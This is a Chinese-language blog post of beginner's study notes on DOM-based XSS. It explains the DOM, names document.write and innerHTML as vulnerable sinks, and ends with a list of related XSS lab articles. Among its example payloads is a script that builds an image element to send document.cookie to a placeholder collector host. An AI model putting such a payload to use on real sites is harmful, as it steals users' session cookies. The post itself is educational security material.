DOM型XSS学习笔记

最新推荐文章于 2024-09-27 06:00:00 发布
最新推荐文章于 2024-09-27 06:00:00 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38275468/article/details/78461523
版权

DOM,全称是Document Object Model,文档对象模型。
DOM实际上是以面向对象方式描述的文档模型。DOM定义了表示和修改文档所需的对象、这些对象的行为和属性以及这些对象之间的关系。可以把DOM认为是页面上数据和结构的一个树形表示,html页面中的所有标签,完全可以一棵以HTML标签为根节点的树,其他的标签都可以看做它的子孙节点。
所谓的DOM型XSS就是通过在页面中创造或修改DOM元素来达到执行恶意代码的目的的XSS攻击方式,它既可以是一种存储型的XSS也可以是一种反射型的XSS。
文档中的DOM型XSS漏洞
1.使用document.write()直接把内容输出到网页导致XSS漏洞。
2.使用innerHTML直接把内容输出至网页导致XSS漏洞。
当然攻击者也可以自己创建或修改DOM元素来达到攻击的目的
1.通过构建<script>document.write();<script>代码来执行恶意代码。
2.通过构建类似于<script>document.body.innerHTML='';<script>
的代码修改页面DOM元素从而执行恶意代码。
3.通过<script>var img=document.createElement("img");img.src="http://127.0.0.1:XXXX/a?"+escape(document.cookie);</script>类似代码来构建DOM元素从而执行自己的恶意代码。
当然进行DOM型XSS攻击的方法还有好多好多,我这个Js技术不过关的萌新就不在这里一一列举了。

瑟瑟发抖的萌新
关注
专栏目录
DOMXSS
Ethan024的博客
04-23 319
实验环境: 皮卡丘靶场—Cross-Site Scripting—DOMXSS 皮卡丘靶场—Cross-Site Scripting—DOMXSS-X 实验步骤: 输入无害字符串查看情况: 查看源代码: str获取text的值,再拼接到<a>标签里面,再写到dom里面。 确认此处的输入点<input>标签和输出点<div>标签,并且输入和输出的过程没有做任何转义操作。 对document.getElementById("dom").innerHT
Dvwa之XSSDOM)全级别学习 笔记
Mbys_Lettuce的博客
09-22 328
因为url#,&之后的内容,不会被提交到服务器,可以直接与浏览器进行交互,所以使用English#攻击一下。所以可能将有关的所有参数都过滤了,但我们还有其他的标签进行攻击,比如使用、等,尝试使用一下就很离谱,没有思路,看一下源码吧。本文为学习笔记,仅供学习
web ---- DomXSS
L0g1c的博客
07-31 2590
存储xss最持久,而且更为隐蔽,因为是存在数据库当的,触发的url当没有带js或者其他的html代码,所以他的实用性更高。其次则是DomXSS因为它能绕过大部分浏览器的过滤,再其次才是反射XSS反射xss还要深思熟虑的考虑根据浏览器去bypass各种过滤,易用性稍微差一些(注意反射xssdomxss都需要在url加入js代码才能够触发)非持久xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。...
XSS | DOM XSS 攻击
最新发布
Blue17 の 小窝
09-27 1388
在网站页面有许多元素,当页面到达浏览器,浏览器会为页面创建一个顶级的 Document object 文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。DOM XSS 程序只有 HTML 代码,并不存在服务器端代码,所以此程序并没有与服务器端进行交互,是一个纯粹的运行在客户端的 JavaScript 脚本代码触发的 XSS 漏洞。标签是没有任何内容的,这符合了我们上面讲的 DOM XSS,后端返回的数据包不包含 XSS 攻击代码的特点。
DomXSS
chenxunyang0492的博客
01-02 317
可能触发DOMXSS属性document.referer属性 window.name属性 location属性 innerHTML属性 documen.write属性 ...
通过DVWA学习DOMXSS
Mi1k7ea
01-02 4092
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞,其触...
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2680
xss学习笔记
理解DOMXSS攻击与防护策略
田靖宇-day211是一篇关于信息安全实训的文章,重点讲解了DOM-XSS攻击的相关知识。...这篇笔记提供了深入理解DOM-XSS攻击及其防护措施的基础,对于网络安全工程师和开发人员来说,是学习和提升安全意识的重要参考资源。
pikachu靶场之XSS学习笔记
Mbys_Lettuce的博客
10-01 501
XSS漏洞一直被评估为web漏洞危害较大的漏洞,在OWASP TOP10的排名一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss也属于高危,只需要替换里面的带测试链接即可。
DOMXSS
weixin_52351575的博客
10-02 561
反射和存储都是通过后台输出,DOM xss是纯前台的漏洞• 反射发出请求时,XSS代码出现在URL,作为输入提交到服务器,服务器解析后响应,在响应的内容出现这段XSS代码。大多只能影响单一用户。• 存储提交的XSS代码会存储在服务端(数据库、内存、文件系统等),下次请求目标页面时不用再提交XSS代码。可能会影响到网站的众多用户。• DOM
xssDOM
xu_1234567的博客
11-04 6642
1.DOMxss原理 dom就是一个树状的模,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射的,也有可能是存储的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)分析完dom-xss之后,再说说存储xss,其实也很好理解,存储xss
XSS学习
seeicb的博客
05-20 688
title: XSS学习 date: 2016-04-03 20:35:43 categories: 安全 tags: [Web安全,XSS] 一、XSS原理 xss即 跨站脚本攻击(Cross Site Scripting),是指攻击者在页面插入恶意的Script脚本,当用户浏览页面时,插入其的Script脚本会被执行,从而达到攻击的目的。 例如: &lt;?php $name = $_G...
domxss ---(waf绕过)
m0_63306943的博客
04-05 1489
DOM 是文档对象化模Document Object Model)的简称。DOM Tree 是指通过 DOM 将 HTML 页面进行解析,并生成的 HTML tree 树状结构和对应访问方法。借助DOM Tree,我们能直接而且简易的操作HTML页面上的每个标记内容DOM技术被Internet Explorer 5.0及以上版本的浏览器所支持,它采取一种非常直观且一致的方式将HTML文档进行模化处理,并借此提供访问、导航和操作页面的简易编程接口。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值